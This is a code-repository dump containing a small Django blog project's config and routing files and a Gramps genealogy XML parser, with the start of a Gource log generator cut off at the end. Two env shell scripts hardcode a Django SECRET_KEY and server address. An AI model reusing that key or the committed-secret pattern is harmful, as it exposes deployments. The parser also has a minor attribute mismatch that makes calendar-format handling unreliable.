[ { "alpha_fraction": 0.6979166865348816, "alphanum_fraction": 0.765625, "avg_line_length": 31, "blob_id": "45a19d01486c06f8f7d866b6827476b4e2066996", "content_id": "100f4358c29da8c969c20241b7eb929fa915fa16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 192, "license_type": "no_license", "max_line_length": 68, "num_lines": 6, "path": "/envs_alt_server.sh", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "#!/bin/sh\nexport DEBUG='False'\nexport TEMPLATE_DEBUG='False'\nexport ALLOWED_HOSTS='168.62.28.36'\nexport STATIC_ROOT='/home/py230admin/djblog9vm/mysite/mysite/static'\nexport SECRET_KEY='na!#t6xZ8P64@b*&K?ndybs6nFK_=n78'\n" }, { "alpha_fraction": 0.550000011920929, "alphanum_fraction": 0.7300000190734863, "avg_line_length": 19, "blob_id": "fffaaa12260eeacc3de5a4d9822bb3c8e2d6a8d3", "content_id": "592e248a52eb0a295e9635d8a6465a674d3dccb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 100, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/requirements.txt", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "dj-database-url==0.5.0\ndjango>=2.2.2\ndjangorestframework==3.9.3\npsycopg2-binary==2.8.2\npytz==2019.1\n" }, { "alpha_fraction": 0.6814814805984497, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 15.875, "blob_id": "3a474c8043f37200cf219866b97f0aa5ef241656", "content_id": "9448876e6fab1c0efd62658de04e9e06b1e5dd06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 135, "license_type": "no_license", "max_line_length": 80, "num_lines": 8, "path": "/README.md", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "# djblog9vm\n\n## Setup\n\nTo set the environment variables, source the envs_alt_server.sh file, like this:\n```\n. 
./envs_alt_server.sh\n```\n" }, { "alpha_fraction": 0.7269503474235535, "alphanum_fraction": 0.7269503474235535, "avg_line_length": 36.599998474121094, "blob_id": "478c481f1fe383caf2aad3c7edcca9e2ede818cf", "content_id": "29e8f84baf3029d7fe31fc5e3f8bf9d7b3d4257d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 81, "num_lines": 15, "path": "/mysite/blogging/urls.py", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "from django.urls import include, path\nfrom blogging.views import list_view, detail_view, add_view\nfrom rest_framework import routers\nfrom .views import PostViewSet, CategoryViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'api_post', PostViewSet)\nrouter.register(r'api_category', CategoryViewSet)\n\nurlpatterns = [\n path('', list_view, name=\"blog_index\"),\n path('posts/<int:post_id>/', detail_view, name=\"blog_detail\"),\n path('add/', add_view, name=\"blog_add\"),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework'))\n]\n" }, { "alpha_fraction": 0.730088472366333, "alphanum_fraction": 0.7876105904579163, "avg_line_length": 36.66666793823242, "blob_id": "6be3862c7e43543d4c7a24715cde381acf028fe6", "content_id": "4c723be87ec90e0f8dac59b40499a1eb4e279a33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 226, "license_type": "no_license", "max_line_length": 69, "num_lines": 6, "path": "/envs.sh", "repo_name": "timm67/djblog9vm", "src_encoding": "UTF-8", "text": "#!/bin/sh\nexport DEBUG='False'\nexport TEMPLATE_DEBUG='False'\nexport ALLOWED_HOSTS='py230-ubtuntu-009009.westus.cloudapp.azure.com'\nexport STATIC_ROOT='/home/py230admin/djblog9vm/mysite/mysite/static'\nexport SECRET_KEY='na!#t6xZ8P64@b*&K?ndybs6nFK_=n78'\n" } ]
5
claws/gramps2gource
https://github.com/claws/gramps2gource
a747f0c9056257d65bf2532b619848edede210bb
5087d22cb8bcc3778a91ecfb279b946b23164aac
073c2942ac1d355fa1be38e21a90ca9891289570
refs/heads/master
2021-01-17T09:01:22.480583
2018-10-17T21:13:49
2018-10-17T21:13:49
15,521,314
6
6
MIT
2013-12-30T05:41:32
2018-10-14T22:19:16
2018-10-17T13:04:49
Python
[ { "alpha_fraction": 0.5034090280532837, "alphanum_fraction": 0.514549195766449, "avg_line_length": 32.422176361083984, "blob_id": "c803e38fb6f5b4d9325d951e8ea8a77ce4137fff", "content_id": "07bb7f771039b658271800ba58af84ed9547cd18", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32854, "license_type": "permissive", "max_line_length": 87, "num_lines": 983, "path": "/gramps.py", "repo_name": "claws/gramps2gource", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n'''\nThis module implements a simple and naive Gramps XML file (.gramps) parser.\n\nAuthor: Chris Laws\n'''\n\nfrom __future__ import unicode_literals\nfrom future.builtins import str\n\nimport datetime\nimport dateutil.parser\nimport gzip\nimport logging\ntry:\n from xml.etree import cElementTree as etree\nexcept ImportError:\n from xml.etree import ElementTree as etree\n\n\nlogger = logging.getLogger(__name__)\n\n\nindent = \" \"\n\n\ndef default_date_parser(datestring):\n ''' Convert a date string into a datetime object '''\n\n # some dates are missing the day so use a default such that\n # a valid datetime object can be created.\n if len(datestring.split(\"-\")) == 2:\n logger.debug(\n \"{0} missing item from date string, using day 01 for\"\n \" compatibility\".format(datestring))\n datestring = \"{0}-01\".format(datestring)\n\n # Dates are used in many different formats, use the\n # dateutil parser in an effort to successfully\n # parse a useful date.\n return dateutil.parser.parse(datestring)\n\n\nclass DateParser(object):\n\n def __init__(self):\n\n self.handlers = {}\n\n # register a default handler to use as a fallback.\n self.register('default', default_date_parser)\n\n def register(self, cal_format, handler):\n '''\n Register a handler function for a specific date_type. For example,\n if your dates are in `French Republican` format use can use this\n method to register a handler function that will convert one of\n these dates into a valid datetime.\n\n :param cal_format: a string identifying the calendar format type.\n For example, `French Republican`.\n\n :param handler: a callable that can convert a date string into a\n valid datetime object.\n '''\n logger.debug(\n 'Registering a date handler for format: %s', cal_format)\n if cal_format in self.handlers:\n raise Exception(\n 'Duplicate date handlers detected for: %s', cal_format)\n self.handlers[cal_format] = handler\n\n def parse(self, datestring, cal_format=None):\n ''' Parse a date string and return a datetime object.\n\n :param format: the format of the date string. 
For example, Islamic,\n French Republican, etc.\n '''\n cformat = cal_format or 'default'\n\n if cformat not in self.handlers:\n logger.warning(\n 'No date parser registered for %s, falling back to default',\n cformat)\n cformat = 'default'\n\n handler = self.handlers.get(cformat)\n return handler(datestring)\n\n\ndate_processor = DateParser()\n\n\ndef generate_timestring(dt):\n '''\n Required because datetime.strftime barfs on years prior to 1900\n '''\n format = \"%Y-%m-%d\"\n if dt.year > 1900:\n return dt.strftime(format)\n else:\n format = format.replace('%Y', str(dt.year))\n dt = datetime.datetime(1900, dt.month, dt.day, dt.hour,\n dt.minute, dt.second)\n\n return dt.strftime(format)\n\n\nclass Place(object):\n '''\n A Gramps place object.\n\n Example of a Gramps place structure:\n\n <places>\n <placeobj handle=\"_bcd2a83849845c12c13\" change=\"1297580946\" id=\"P0806\">\n <ptitle>Morwell, Victoria, Australia</ptitle>\n <coord long=\"146.3947107\" lat=\"-38.2345742\"/>\n </placeobj>\n '''\n\n def __init__(self, store):\n self.store = store\n self.handle = None\n self.id = None\n self.type = None\n self.title = None\n self.lat = None\n self.lon = None\n\n @property\n def coordinates(self):\n '''\n Return a tuple of lat, lon for the location\n '''\n if self.lat and self.lon:\n return (self.lat, self.lon)\n return None\n\n def __str__(self):\n o = []\n o.append(\"Place\")\n title = \"\"\n if self.title:\n title = self.title\n lat_lon = \"\"\n if self.lat and self.lon:\n lat_lon = \" (lat={0}, lon={1})\".format(self.lat, self.lon)\n o.append(\"{0}{1}{2}\".format(indent, title, lat_lon))\n return \"\\n\".join(o)\n\n\nclass Event(object):\n '''\n A Gramps event object.\n\n Example of a Gramps event structure:\n\n <event handle=\"_bb2a73da89376f2e069\" change=\"1287656448\" id=\"E1000\">\n <type>Death</type>\n <dateval val=\"1955-06-04\"/>\n <place hlink=\"_bb2a73da908569b4132\"/>\n <noteref hlink=\"_bb2a73da9362223d031\"/>\n <sourceref hlink=\"_bb60df55dd862a3e6b1\" conf=\"4\">\n <spage>1955/012559</spage>\n <noteref hlink=\"_bb60eb134ff61992598\"/>\n <dateval val=\"1955-06-04\"/>\n </sourceref>\n </event>\n\n '''\n\n def __init__(self, store):\n self.store = store\n self.handle = None\n self.id = None\n self.type = None\n self.description = None\n self.date = None\n self.date_type = None\n self.date_cformat = None\n\n # handles\n self.place_handle = None\n self.note_handles = []\n self.source_handles = []\n\n @property\n def datetime(self):\n '''\n Return a datetime object for this event date\n '''\n if self.date:\n try:\n return date_processor.parse(\n self.date, cal_format=self.date_cformat)\n except Exception:\n logger.exception(\n \"Problem parsing date: {0}, cal_format={1}\".format(\n self.date, self.cformat))\n raise\n else:\n return None\n\n def datetime_as_string(self):\n return generate_timestring(self.datetime)\n\n @property\n def place(self):\n if self.place_handle:\n return self.store.get_place(self.place_handle)\n return None\n\n def __str__(self):\n o = []\n o.append(\"Event\")\n\n dateStr = \"unknown\"\n if self.date:\n if self.date_type:\n dateStr = \"{0} {1}\".format(self.date_type, self.date)\n else:\n dateStr = self.date\n\n o.append(\"{0}{1}, {2}\".format(indent, self.type, dateStr))\n\n placeStr = \"unknown\"\n if self.place:\n thePlace = self.store.get_place(self.place)\n if thePlace:\n p = []\n for line in str(thePlace).split(\"\\n\"):\n p.append(\"{0}{1}\".format(indent, line))\n placeStr = \"\\n\".join(p)\n o.append(placeStr)\n else:\n 
o.append(\"{0}Place\".format(indent * 2))\n o.append(\"{0}None\".format(indent * 3))\n\n if self.description:\n o.append(\"{0}description={1}\".format(indent, self.description))\n\n return \"\\n\".join(o)\n\n\nclass Person(object):\n '''\n A person object\n '''\n\n def __init__(self, store):\n self.store = store\n self.handle = None\n self.id = None\n self.gender = None\n self.firstnames = []\n self.prefix = None\n self.surname = None\n self._birth = None\n self._death = None\n\n # handles\n self.event_handles = []\n self.child_of_handle = None\n self.parent_in_handles = []\n self.notes = []\n self._events = None\n\n @property\n def name(self):\n '''\n Return a string containing the full name of this person\n i.e. firstname middlenames surname\n '''\n if len(self.firstnames) > 1:\n firstnames = \" \".join(self.firstnames)\n else:\n firstnames = \"\".join(self.firstnames)\n return \"{0} {1}\".format(firstnames, self.surname)\n\n @property\n def name_with_dates(self):\n '''\n Return a string containing this persons name and their\n birth and death dates.\n i.e firstname surname (b. date, d. date)\n '''\n if self.death is None:\n return \"{0} (b. {1})\".format(self.name, self.birth)\n else:\n return \"{0} (b. {1}, d. {2})\".format(self.name,\n self.birth,\n self.death)\n\n @property\n def birth(self):\n '''\n Return a birth date string for this person (if available).\n Include any prefixes such as bef, aft, abt, etc.\n '''\n if self._birth is None:\n # search through events\n for event in self.events:\n if event.type == 'Birth':\n if event.date:\n if event.date_type:\n self._birth = \"{0} {1}\".format(event.date_type,\n event.date)\n else:\n self._birth = event.date\n else:\n self._birth = \"unknown\"\n\n return self._birth\n\n @property\n def birth_datetime(self):\n '''\n Return a birth date string for this person (if available).\n Include any prefixes such as bef, aft, abt, etc.\n '''\n # search through events\n for event in self.events:\n if event.type == 'Birth':\n return event.datetime\n return None\n\n @property\n def death(self):\n '''\n Return a death date string for this person (if available).\n Include any prefixes such as bef, aft, abt, etc.\n '''\n if self._death is None:\n # search through events\n for event in self.events:\n if event.type == 'Death':\n if event.date:\n if event.date_type:\n self._death = \"{0} {1}\".format(event.date_type,\n event.date)\n else:\n self._death = event.date\n else:\n self._death = \"unknown\"\n\n return self._death\n\n @property\n def death_datetime(self):\n '''\n Return a death date string for this person (if available).\n Include any prefixes such as bef, aft, abt, etc.\n '''\n # search through events\n for event in self.events:\n if event.type == 'Death':\n return event.datetime\n return None\n\n @property\n def events(self):\n if self._events is None:\n self._events = []\n if self.event_handles:\n for event_handle in self.event_handles:\n event = self.store.get_event(event_handle)\n self._events.append(event)\n return self._events\n\n def associated_events(self, includeEventsWithNoDate=False):\n '''\n Return a time ordered list of tuples for each event that this person\n was involved with. This set includes direct event involvement\n (eg. birth) and indirect involvement (eg. 
birth of younger sibling).\n\n Each item in the list is a tuple containing a Person or Family object\n and an Event object.\n '''\n\n dated_events = []\n undated_events = []\n\n SiblingCutoffDatetime = None\n directPersonEvent = True\n\n for event in self.events:\n if event.datetime:\n if event.type in ['Immigration', 'Emmigration']:\n # This flag is used later to ensure we don't associate\n # siblings with this person's events after an immigration\n # event as it is assumed that the person would not be\n # involved/around these events.\n SiblingCutoffDatetime = event.datetime\n dated_events.append((self, event, directPersonEvent))\n else:\n if includeEventsWithNoDate:\n undated_events.append((self, event, directPersonEvent))\n else:\n logger.debug(\n \"Discarding direct person event {0} for {1} as it \"\n \"has no date\".format(event.type, self.name))\n pass\n\n # now retrieve associated events that this person was involved with\n directPersonEvent = False\n\n if self.parent_in_handles:\n logger.debug(\n \"{0} is a parent in {1} families\".format(\n self.name, len(self.parent_in_handles)))\n for parent_handle in self.parent_in_handles:\n family = self.store.get_family(parent_handle)\n # Add any family events such as marriage, divorce\n logger.debug(\n \"Family {0} has {1} family events\".format(\n family.name, len(family.events)))\n for event in family.events:\n if event.datetime:\n dated_events.append(\n (family, event, directPersonEvent))\n else:\n if includeEventsWithNoDate:\n undated_events.append(\n (family, event, directPersonEvent))\n else:\n logger.debug(\n \"Discarding associated family event {0} for \"\n \"{1} as it has no date\".format(\n event.type, family.name))\n pass\n\n logger.debug(\n \"Family {0} has {1} children\".format(\n family.name, len(family.children)))\n # add birth of children\n if family.children:\n for child in family.children:\n for event in child.events:\n if event.type == 'Birth':\n if event.datetime:\n dated_events.append(\n (child, event, directPersonEvent))\n else:\n if includeEventsWithNoDate:\n undated_events.append(\n (child, event, directPersonEvent))\n else:\n logger.debug(\n \"Discarding associated family \"\n \"event {0} for {1} as it has no \"\n \"date\".format(\n event.type, child.name))\n pass\n\n if self.child_of_handle:\n # potentially associate younger sibling location events too\n # as this person was likely around those locations too.\n family = self.store.get_family(self.child_of_handle)\n logger.debug(\n \"Family {0} had {1} children\".format(\n family.name, len(family.children)))\n for sibling in family.children:\n if sibling.handle != self.handle:\n for event in sibling.events:\n if event.type == 'Birth':\n if event.datetime:\n if event.datetime > self.birth_datetime:\n # don't associate sibling birth events if they\n # occur after the person has immigrated/emmigrated.\n if SiblingCutoffDatetime is None:\n dated_events.append(\n (sibling, event, directPersonEvent))\n else:\n if event.datetime < SiblingCutoffDatetime:\n dated_events.append(\n (sibling, event, directPersonEvent))\n else:\n if includeEventsWithNoDate:\n undated_events.append(\n (sibling, event, directPersonEvent))\n else:\n logger.debug(\n \"Discarding associated family event \"\n \"{0} for {1} as it has no date\" % (\n event.type, sibling.name))\n pass\n\n # sort events in time order. 
This can only be done after\n # making sure that we only have events with dates.\n def get_datetime(dated_event_tuple):\n person_or_family_object, event, directEvent = dated_event_tuple\n return event.datetime\n\n dated_events.sort(key=get_datetime)\n\n events = dated_events\n\n # tack undated events onto end of time ordered list if requested\n if includeEventsWithNoDate:\n events.extend(undated_events)\n\n return events\n\n def ancestors(self, ancestors=None):\n \"\"\"\n Return an unordered list of this person's handle and those of their\n ancestors.\n \"\"\"\n logger.debug(\"Collecting ancestors for {0}\".format(self.name))\n if ancestors is None:\n ancestors = []\n ancestors.append(self.handle)\n\n if self.child_of_handle:\n family = self.store.get_family(self.child_of_handle)\n\n # walk up the father's tree\n if family.father:\n family.father.ancestors(ancestors)\n\n # walk up the mother's tree\n if family.mother:\n family.mother.ancestors(ancestors)\n\n return ancestors\n\n def descendents(self):\n '''\n Return an unordered list of this person's handle and those of their\n descendents.\n '''\n raise NotImplementedError\n\n def __str__(self):\n o = []\n o.append(\"Person\")\n o.append(\"{0}{1}\".format(indent, self.name_with_dates))\n\n if self.child_of_handle:\n theFamily = self.store.get_family(self.child_of_handle)\n o.append(\"{0}Child of {1}\".format(indent, theFamily.name))\n else:\n o.append(\"{0}Child of unknown\".format(indent))\n\n if self.parent_in_handles:\n for p in self.parent_in_handles:\n theFamily = self.store.get_family(p)\n o.append(\"{0}Parent in {1}\".format(indent, theFamily.name))\n if self.events:\n o.append(\"{0}Events:\".format(indent))\n indent2 = indent * 2\n lines = []\n for event in self.events:\n for line in str(event).split(\"\\n\"):\n lines.append(\"{0}{1}\".format(indent2, line))\n eventStr = \"\\n\".join(lines)\n o.append(eventStr)\n\n return \"\\n\".join(o)\n\n\nclass Family(object):\n '''\n A Gramps family object\n\n Example of a Gramps family structure:\n\n <family handle=\"_bbd9a6fc3005c442174\" change=\"1296473477\" id=\"F0414\">\n <rel type=\"Unknown\"/>\n <father hlink=\"_bbd9a89f2d86cb5d966\"/>\n <mother hlink=\"_bbd9aa0bf5828e2063d\"/>\n <eventref hlink=\"_bbd9aac4f234de2e484\" role=\"Family\"/>\n <childref hlink=\"_bbd99985f4654c844c2\"/>\n <childref hlink=\"_bbd9b4d182d06ba9642\"/>\n <childref hlink=\"_bbd9b59cb0709454032\"/>\n <childref hlink=\"_bbd9b32db1501cb7968\"/>\n <childref hlink=\"_bbd9fd3f1404b1ac595\"/>\n </family>\n\n '''\n\n def __init__(self, store):\n self.store = store\n self.handle = None\n self.id = None\n self.father_handle = None\n self.mother_handle = None\n self.relationship = None\n\n self.event_handles = []\n self.children_handles = []\n self.step_children_handles = []\n self.source_handles = []\n self._mother = None\n self._father = None\n self._children = None\n self._events = None\n\n @property\n def name(self):\n '''\n Return a string containing the father and mother name for this family\n '''\n if self.mother:\n m = self.mother.name\n else:\n m = \"unknown\"\n\n if self.father:\n f = self.father.name\n else:\n f = \"unknown\"\n\n family_name = \"{0} & {1}\".format(f, m)\n return family_name\n\n @property\n def name_with_dates(self):\n '''\n Return a string containing the father and mother name of this family\n which include the birth and death dates.\n '''\n if self.mother:\n m = self.mother.name_with_dates\n else:\n m = \"unknown\"\n\n if self.father:\n f = self.father.name_with_dates\n else:\n f = 
\"unknown\"\n\n family_name = \"{0} & {1}\".format(f, m)\n return family_name\n\n @property\n def mother(self):\n if self._mother is None:\n # search for mother person\n if self.mother_handle:\n self._mother = self.store.get_person(self.mother_handle)\n return self._mother\n\n @property\n def father(self):\n if self._father is None:\n # search for father person\n if self.father_handle:\n self._father = self.store.get_person(self.father_handle)\n return self._father\n\n @property\n def children(self):\n if self._children is None:\n self._children = []\n if self.children_handles:\n # search for children persons\n for child_handle in self.children_handles:\n child = self.store.get_person(child_handle)\n if child:\n self._children.append(child)\n return self._children\n\n @property\n def events(self):\n if self._events is None:\n self._events = []\n if self.event_handles:\n for event_handle in self.event_handles:\n event = self.store.get_event(event_handle)\n self._events.append(event)\n return self._events\n\n def __str__(self):\n o = []\n o.append(\"Family\")\n o.append(\"{0}{1}\".format(indent, self.name_with_dates))\n o.append(\"{0}relationship={1}\".format(indent, self.relationship))\n\n # TODO: display eventref here\n\n if self.children:\n o.append(\"{0}Children:\".format(indent))\n indent2 = indent * 2\n for child in self.children:\n indented_child_lines = []\n for line in str(child).split(\"\\n\"):\n indented_child_lines.append(\"{0}{1}\".format(indent2, line))\n childStr = \"\\n\".join(indented_child_lines)\n o.append(childStr)\n else:\n o.append(\"{0}Children: None\".format(indent))\n\n return \"\\n\".join(o)\n\n\nclass Store(object):\n '''\n Stores information extracted by the Gramps database parser\n '''\n\n def __init__(self):\n self.persons = {}\n self.families = {}\n self.events = {}\n self.places = {}\n self.notes = {}\n self.sources = {}\n\n def get_person(self, handle):\n '''\n Return the person with the specified handle\n '''\n return self.persons.get(handle, None)\n\n def get_family(self, handle):\n '''\n Return the family with the specified handle\n '''\n return self.families.get(handle, None)\n\n def get_event(self, handle):\n '''\n Return the event with the specified handle\n '''\n return self.events.get(handle, None)\n\n def get_place(self, handle):\n '''\n Return the place with the specified handle\n '''\n return self.places.get(handle, None)\n\n def get_source(self, handle):\n '''\n Return the source with the specified handle\n '''\n return self.sources.get(handle, None)\n\n def get_note(self, handle):\n '''\n Return the note with the specified handle\n '''\n return self.notes.get(handle, None)\n\n def find_person(self, search_name):\n '''\n Return the handle for the first person found with a\n matching name.\n Return None if no match is found.\n '''\n logger.debug(\"Searching for {0}\".format(search_name))\n search_person_handle = None\n for person_handle in self.persons:\n person = self.get_person(person_handle)\n if person.name == search_name:\n search_person_handle = person.handle\n logger.debug(\"Found {0} with handle {1}\".format(search_name,\n person.handle))\n break\n return search_person_handle\n\n\nclass NS:\n '''\n Namespace helper to append the gramps namespace onto tags.\n This makes writing the search paths easier.\n '''\n def __init__(self, uri):\n self.uri = uri\n\n def __getattr__(self, tag):\n return self.uri + tag\n\n def __call__(self, path):\n prefix = None\n if path.startswith(\".//\"):\n items = path[3:].split(\"/\")\n prefix = './/'\n else:\n 
items = path.split(\"/\")\n\n ns_tags = []\n for tag in items:\n ns_tag = getattr(self, tag)\n ns_tags.append(ns_tag)\n ns_path = \"/\".join(ns_tags)\n\n if prefix:\n ns_path = './/' + ns_path\n\n return ns_path\n\n\ndef to_pretty_xml(elem):\n \"\"\"\n Return a pretty-printed XML string for the Element.\n \"\"\"\n from xml.dom import minidom\n rough_string = etree.tostring(elem, 'utf-8')\n reparsed = minidom.parseString(rough_string)\n return reparsed.toprettyxml(indent=\" \")\n\n\nclass Parser(object):\n\n def parse(self, gramps_file):\n \"\"\"\n @return: a store object populated with content extracted from the database.\n \"\"\"\n\n logger.info(\"Loading Gramps database from {0}\".format(gramps_file))\n\n store = Store()\n\n with gzip.GzipFile(filename=gramps_file, mode=\"rb\", compresslevel=9) as fd:\n data = fd.read()\n\n root = etree.fromstring(data)\n\n # Detect the namespace so we know what to place in front\n # of the known tag names.\n detected_namespace = \"\"\n items = root.tag.split(\"}\")\n if len(items) == 2:\n namespace_candidate, tag = items\n if \"{\" in namespace_candidate:\n # There is a namespace prefix\n detected_namespace = '{%s}' % namespace_candidate[1:]\n\n GrampsNS = NS(detected_namespace)\n\n # Extract person entries into Person objects and store them\n # in the persons dict keyed by the person's handle.\n #\n personNodes = root.findall(GrampsNS('.//people/person'))\n\n for personNode in personNodes:\n p = Person(store)\n p.id = personNode.attrib.get('id')\n\n genderNode = personNode.find(GrampsNS('gender'))\n p.gender = genderNode.text\n\n handle = personNode.attrib.get('handle')\n p.handle = handle\n store.persons[handle] = p\n\n nameNode = personNode.find(GrampsNS('name'))\n if nameNode:\n\n firstnameNode = nameNode.find(GrampsNS('first'))\n if firstnameNode is not None:\n p.firstnames = firstnameNode.text.split(\" \")\n else:\n pass # No first name node found\n\n surnameNode = nameNode.find(GrampsNS('surname'))\n if surnameNode is not None:\n p.surname = surnameNode.text\n p.prefix = surnameNode.attrib.get('prefix')\n else:\n pass # No surname node found\n else:\n pass # No name node found\n\n for eventNode in personNode.findall(GrampsNS('eventref')):\n event_handle = eventNode.attrib.get('hlink')\n p.event_handles.append(event_handle)\n\n for parentinNode in personNode.findall(GrampsNS('parentin')):\n parentin_handle = parentinNode.attrib.get('hlink')\n p.parent_in_handles.append(parentin_handle)\n\n childofNode = personNode.find(GrampsNS('childof'))\n if childofNode is not None:\n p.child_of_handle = childofNode.attrib.get('hlink')\n\n for noteNode in personNode.findall(GrampsNS('noteref')):\n note_handle = noteNode.attrib.get('hlink')\n p.notes.append(note_handle)\n\n familyNodes = root.findall(GrampsNS('.//families/family'))\n\n for familyNode in familyNodes:\n f = Family(store)\n f.id = familyNode.attrib.get('id')\n\n motherNode = familyNode.find(GrampsNS('mother'))\n if motherNode is not None:\n f.mother_handle = motherNode.attrib.get('hlink')\n\n fatherNode = familyNode.find(GrampsNS('father'))\n if fatherNode is not None:\n f.father_handle = fatherNode.attrib.get('hlink')\n\n relationshipNode = familyNode.find(GrampsNS('rel'))\n if relationshipNode is not None:\n f.relationship = relationshipNode.attrib.get('type')\n\n for eventNode in familyNode.findall(GrampsNS('eventref')):\n f.event_handles.append(eventNode.attrib.get('hlink'))\n\n handle = familyNode.attrib.get('handle')\n f.handle = handle\n store.families[handle] = f\n\n for childNode in 
familyNode.findall(GrampsNS('childref')):\n                child_handle = childNode.attrib.get('hlink')\n                if childNode.attrib.get('frel') == 'Stepchild':\n                    f.step_children_handles.append(child_handle)\n                else:\n                    f.children_handles.append(child_handle)\n\n            for sourceNode in familyNode.findall(GrampsNS('sourceref')):\n                source_handle = sourceNode.attrib.get('hlink')\n                f.source_handles.append(source_handle)\n\n        eventNodes = root.findall(GrampsNS('.//events/event'))\n\n        for eventNode in eventNodes:\n            e = Event(store)\n            e.id = eventNode.attrib.get('id')\n\n            handle = eventNode.attrib.get('handle')\n            e.handle = handle\n            store.events[handle] = e\n\n            typeNode = eventNode.find(GrampsNS('type'))\n            if typeNode is not None:\n                e.type = typeNode.text\n\n            datevalNode = eventNode.find(GrampsNS('dateval'))\n            if datevalNode is not None:\n                e.date = datevalNode.attrib.get('val')\n                e.date_type = datevalNode.attrib.get('type')\n                e.cformat = datevalNode.attrib.get('cformat')\n\n            descriptionNode = eventNode.find(GrampsNS('description'))\n            if descriptionNode is not None:\n                e.description = descriptionNode.text\n\n            placeNode = eventNode.find(GrampsNS('place'))\n            if placeNode is not None:\n                e.place_handle = placeNode.attrib.get('hlink')\n\n            for noteNode in eventNode.findall(GrampsNS('noteref')):\n                note_handle = noteNode.attrib.get('hlink')\n                e.note_handles.append(note_handle)\n\n            for sourceNode in eventNode.findall(GrampsNS('sourceref')):\n                source_handle = sourceNode.attrib.get('hlink')\n                e.source_handles.append(source_handle)\n\n        placeNodes = root.findall(GrampsNS('.//places/placeobj'))\n\n        for placeNode in placeNodes:\n            p = Place(store)\n            p.id = placeNode.attrib.get('id')\n\n            handle = placeNode.attrib.get('handle')\n            p.handle = handle\n            store.places[handle] = p\n\n            titleNode = placeNode.find(GrampsNS('ptitle'))\n            if titleNode is not None:\n                p.title = titleNode.text\n\n            coordNode = placeNode.find(GrampsNS('coord'))\n            if coordNode is not None:\n                p.lat = coordNode.attrib.get('lat')\n                p.lon = coordNode.attrib.get('long')\n\n        # TODO:\n        # extract sources\n        # extract notes\n        # etc\n\n        return store\n\nparser = Parser()\n" }, { "alpha_fraction": 0.52869713306427, "alphanum_fraction": 0.5352604389190674, "avg_line_length": 38.45454406738281, "blob_id": "2227c1eca1b4d67d19a4becf669a9fc348eccd57", "content_id": "f0d4aa68cc66626f277c712290884d18a7bbeca2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14322, "license_type": "permissive", "max_line_length": 116, "num_lines": 363, "path": "/gramps2gource.py", "repo_name": "claws/gramps2gource", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n'''\nThis script produces a custom Gource log file that can be passed to Gource for\nit to display family history information. 
Currently it supports ancestors only.\n\nChoose a focus person and pass this person's name along with the Gramps .gramps\nfile path to the script via command line arguments.\n\n$ python gramps2gource.py --name=\"Focus Person\" --db=path/to/filename.gramps\n\nThen display the custom log using gource:\n\n $ cat /path/to/pedigree_<name>.log | gource -1280x720 --log-format custom\n --font-size 20 --hide users,dirnames,date --stop-at-end\n --camera-mode overview --seconds-per-day 1 --disable-bloom\n --auto-skip-seconds 1 -i 0 -c 3.0 -\n\nThe visualisation can be recorded to file using:\n\n $ cat /path/to/pedigree_<name>.log | gource -1280x720 --log-format custom\n --font-size 20 --hide users,dirnames,date --stop-at-end\n --camera-mode overview --seconds-per-day 1 --disable-bloom\n --auto-skip-seconds 1 -i 0 -c 3.0 -output-ppm-stream -\n --output-framerate 60 - | avconv -y -r 60 -f image2pipe -vcodec ppm -i -\n -b 8192K /path/to/pedigree_<name>.mp4\n\nAuthor: Chris Laws\n'''\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom future.builtins import open\nfrom future.builtins import int\n\nimport datetime\nimport logging\nimport sys\nimport time\n\nimport gramps\n\n\nlogger = logging.getLogger(__name__)\n\n\nref_dt = datetime.datetime(1970, 1, 1, 0, 0, 0)\nref_timestamp = time.mktime(ref_dt.timetuple())\ntry:\n secondsInOneDay = datetime.timedelta(days=1).total_seconds()\nexcept AttributeError as ex:\n # python2.6 does not have total_seconds\n one_day_dt = datetime.timedelta(days=1)\n secondsInOneDay = (one_day_dt.microseconds + (one_day_dt.seconds + one_day_dt.days * 24 * 3600) * 10**6) / 10**6\n\n\nGOURCE_ADDED = 'A' # maps to birth\nGOURCE_DELETED = 'D' # maps to death\nGOURCE_MODIFIED = 'M' # maps to change\nGOURCE_UNKNOWN = '?' # maps to nothing\n\n\nclass Gramps2Gource(object):\n '''\n Create Gource custom logs from Gramps data files.\n '''\n\n def __init__(self, gramps_file):\n self.db = gramps.parser.parse(gramps_file)\n\n def get_ancestors(self, person, ancestors=None, gource_prefix=None):\n \"\"\"\n Return an unordered list of tuples for this person and their\n ancestors. 
